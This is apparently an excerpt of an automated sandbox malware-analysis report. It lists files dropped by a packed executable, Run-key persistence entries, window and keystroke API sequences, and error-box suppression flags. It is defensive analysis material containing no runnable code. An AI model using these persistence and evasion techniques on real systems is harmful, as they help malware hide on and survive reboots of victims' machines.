                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-handle-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-heap-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-synch-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-heap-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\python312.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-errorhandling-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-utility-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\_bz2.pyd
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-heap-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-namedpipe-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\VCRUNTIME140.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\_ssl.pyd
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-processthreads-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-debug-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-processthreads-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-utility-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-locale-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\_ctypes.pyd
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\_ssl.pyd
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-locale-l1-1-0.dll
                        Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\wsruwii
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\select.pyd
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-time-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\python312.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-interlocked-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\_sqlite3.pyd
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-handle-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-interlocked-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\_hashlib.pyd
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\rar.exe
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-file-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\_decimal.pyd
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-timezone-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\_queue.pyd
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-runtime-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-conio-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-rtlsupport-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-memory-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\libssl-3.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\unicodedata.pyd
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\libcrypto-3.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-debug-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-convert-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-localization-l1-2-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-process-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-console-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\sqlite3.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-datetime-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-environment-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-string-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-localization-l1-2-0.dll
                        Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\DE5A.exe
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\VCRUNTIME140.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-libraryloader-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-synch-l1-2-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-heap-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\_hashlib.pyd
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-sysinfo-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-processenvironment-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-util-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-profile-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-util-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\_socket.pyd
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-file-l2-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-runtime-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-file-l2-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-math-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-string-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\rar.exe
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\_queue.pyd
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-memory-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-stdio-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-console-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-stdio-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\_lzma.pyd
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-filesystem-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-process-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\_decimal.pyd
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-convert-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-timezone-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\select.pyd
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\libffi-8.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-profile-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\_socket.pyd
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-filesystem-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-processthreads-l1-1-1.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-processthreads-l1-1-1.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-file-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-datetime-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\libcrypto-3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\sqlite3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\unicodedata.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\_sqlite3.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\ucrtbase.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\_lzma.pydJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wsruwiiJump to dropped file

                        Boot Survival

                        Source: C:\Users\user\AppData\Local\Temp\bound.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-ZZZU66
                        Source: C:\Users\user\AppData\Local\Temp\bound.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Rmc-ZZZU66

                        Hooking and other Techniques for Hiding and Protection

                        Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\wsruwii:Zone.Identifier read attributes | delete
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_00A226DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009AFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_00A226DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_009AFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_001D26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_0015FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99C53F0 GetProcAddress (called 44 times in sequence)
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
